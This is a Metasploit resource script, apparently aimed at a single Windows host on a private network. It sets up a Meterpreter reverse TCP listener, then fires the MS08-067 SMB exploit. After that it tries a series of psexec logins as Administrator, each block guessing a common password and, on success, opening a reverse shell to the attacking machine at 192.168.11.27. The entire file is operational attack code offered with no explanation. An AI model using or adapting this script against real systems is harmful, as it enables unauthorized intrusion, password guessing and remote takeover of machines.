use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lport 4444
set lhost 192.168.11.27
exploit -j -z
setg DisablePayloadHandler 1
use exploit/windows/smb/ms08_067_netapi
set rhost 192.168.11.26
set payload windows/meterpreter/reverse_tcp
set lport 4444
set lhost 192.168.11.27
exploit -j -z 
use exploit/windows/smb/psexec
set SMBUser Administrator
set SMBPass admin
set RHOST 192.168.11.26
set PAYLOAD windows/meterpreter/reverse_tcp
set lport 4444
set lhost 192.168.11.27
exploit -j -z
use exploit/windows/smb/psexec
set SMBUser Administrator
set SMBPass root
set RHOST 192.168.11.26
set PAYLOAD windows/meterpreter/reverse_tcp
set lport 4444
set lhost 192.168.11.27
exploit -j -z
use exploit/windows/smb/psexec
set SMBUser Administrator
set SMBPass tonis
set RHOST 192.168.11.26
set PAYLOAD windows/meterpreter/reverse_tcp
set lport 4444
set lhost 192.168.11.27
exploit -j -z
use exploit/windows/smb/psexec
set SMBUser Administrator
set SMBPass 0215
set RHOST 192.168.11.26
set PAYLOAD windows/meterpreter/reverse_tcp
set lport 4444
set lhost 192.168.11.27
exploit -j -z
use exploit/windows/smb/psexec
set SMBUser Administrator
set SMBPass toor
set RHOST 192.168.11.26
set PAYLOAD windows/meterpreter/reverse_tcp
set lport 4444
set lhost 192.168.11.27
exploit -j -z
use exploit/windows/smb/psexec
set SMBUser Administrator
set SMBPass password
set RHOST 192.168.11.26
set PAYLOAD windows/meterpreter/reverse_tcp
set lport 4444
set lhost 192.168.11.27
exploit -j -z
use exploit/windows/smb/psexec
set SMBUser Administrator
set SMBPass password1
set RHOST 192.168.11.26
set PAYLOAD windows/meterpreter/reverse_tcp
set lport 4444
set lhost 192.168.11.27
exploit -j -z
use exploit/windows/smb/psexec
set SMBUser Administrator
set SMBPass 12345
set RHOST 192.168.11.26
set PAYLOAD windows/meterpreter/reverse_tcp
set lport 4444
set lhost 192.168.11.27
exploit -j -z
use exploit/windows/smb/psexec
set SMBUser Administrator
set SMBPass 
set RHOST 192.168.11.26
set PAYLOAD windows/meterpreter/reverse_tcp
set lport 4444
set lhost 192.168.11.27
exploit -j -z
